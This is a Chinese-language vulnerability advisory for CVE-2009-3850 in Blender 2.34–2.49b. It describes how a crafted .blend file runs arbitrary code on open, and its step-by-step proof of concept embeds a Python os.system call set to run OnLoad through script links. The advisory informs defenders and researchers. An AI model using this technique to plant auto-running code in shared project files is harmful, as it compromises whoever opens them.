发布日期：2009-11-05
更新日期：2009-11-06

受影响系统：

Blender Foundation Blender 2.49b
Blender Foundation Blender 2.40
Blender Foundation Blender 2.35a
Blender Foundation Blender 2.34

描述：

---

BUGTRAQ  ID: 36838
CVE ID: CVE-2009-3850

Blender是一款免费的3D建模软件。

如果用户使用Blender打开了畸形的.blend项目文件，就可能导致执行任意代码。

<*来源：Diego Juarez
  
  链接：http://marc.info/?l=bugtraq&m=125745599028498&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

. 打开Text Editor面板
. 右击画布选择New
. 写入以下python代码：

/-----
      import os
      os.system("calc.exe")
- -----/

. 在文本名称字段（TX:Text.001）输入脚本名，如TX:myscript
. 打开Buttons Window面板
. 从panel下拉框中选择Script
. 确认选择了enable script links
. 点击new
. 选择所创建的脚本（如myscript）
. 从事件下拉列表中选择OnLoad
. 在User Preferences面板中选择File->Save，然后保存项目

建议：

---

厂商补丁：

Blender Foundation
------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://blender.org/

浏览次数：2765
严重程度：0（网友投票）